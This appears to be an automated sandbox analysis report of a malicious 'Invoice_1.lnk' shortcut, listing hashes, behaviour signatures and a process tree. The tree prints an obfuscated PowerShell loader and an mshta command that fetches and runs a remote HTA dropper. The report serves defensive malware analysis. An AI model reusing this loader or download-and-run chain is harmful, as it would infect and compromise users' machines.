Analysis
- max time kernel: 40s
- max time network: 44s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 24-05-2022 14:15

Static task: static1
Behavioral task: behavioral1
Sample: Invoice_1.lnk
Resource: win7-20220414-en (windows7_x64)
0 signatures, 0 seconds
General
- Target: Invoice_1.lnk
- Size: 2KB
- MD5: c00c67f3de031c5ae198ba0362b5dd01
- SHA1: 40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
- SHA256: d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
- SHA512: 4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad
- Score: 10/10
Malware Config
Extracted
- Language: hta
- Source: hta.dropper
- URLs: https://conderadio.tv/09872574.hta
Signatures
- Blocklisted process makes network request (4 IoCs)
  Processes:
    flow  pid   process
    4     1084  mshta.exe
    5     1084  mshta.exe
    6     1084  mshta.exe
    7     1084  mshta.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies Internet Explorer settings
  Processes:
    description  ioc                                                                                                       process
    Key created  \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   process
    1336  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  1336  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
    description                       pid   process         target process
    PID 2004 wrote to memory of 1336  2004  cmd.exe         powershell.exe
    PID 2004 wrote to memory of 1336  2004  cmd.exe         powershell.exe
    PID 2004 wrote to memory of 1336  2004  cmd.exe         powershell.exe
    PID 1336 wrote to memory of 1084  1336  powershell.exe  mshta.exe
    PID 1336 wrote to memory of 1084  1336  powershell.exe  mshta.exe
    PID 1336 wrote to memory of 1084  1336  powershell.exe  mshta.exe
Processes
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice_1.lnk
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#oeE'}tV41O#>$zfkmQNMMGKcDTdJr=@(30802,30808,30797,30809,30790,30725,30797,30809,30809,30805,30808,30751,30740,30740,30792,30804,30803,30793,30794,30807,30790,30793,30798,30804,30739,30809,30811,30740,30741,30750,30749,30748,30743,30746,30748,30745,30739,30797,30809,30790);<#oeE'}tV41O#>$JxXPDMbtIHLsflxCnW=@(30766,30762,30781);<#oeE'}tV41O#>function najjGYpeT($gNCFLP){$KeafQvWRzpQ=30693;<#oeE'}tV41O#>$GDaRsn=$Null;foreach($jimJcuhW in $gNCFLP){$GDaRsn+=[char]($jimJcuhW-$KeafQvWRzpQ)};return $GDaRsn};sal pQtoDlBENz (najjGYpeT $JxXPDMbtIHLsflxCnW);<#oeE'}tV41O#>pQtoDlBENz((najjGYpeT $zfkmQNMMGKcDTdJr));
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" https://conderadio.tv/09872574.hta
      - Blocklisted process makes network request
      - Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- memory/1084-97-0x0000000000000000-mapping.dmp
- memory/1336-88-0x0000000000000000-mapping.dmp
- memory/1336-90-0x000007FEF36C0000-0x000007FEF40E3000-memory.dmp (Filesize 10.1MB)
- memory/1336-94-0x000007FEF2B60000-0x000007FEF36BD000-memory.dmp (Filesize 11.4MB)
- memory/1336-95-0x0000000002334000-0x0000000002337000-memory.dmp (Filesize 12KB)
- memory/1336-96-0x000000000233B000-0x000000000235A000-memory.dmp (Filesize 124KB)
- memory/2004-54-0x000007FEFBA41000-0x000007FEFBA43000-memory.dmp (Filesize 8KB)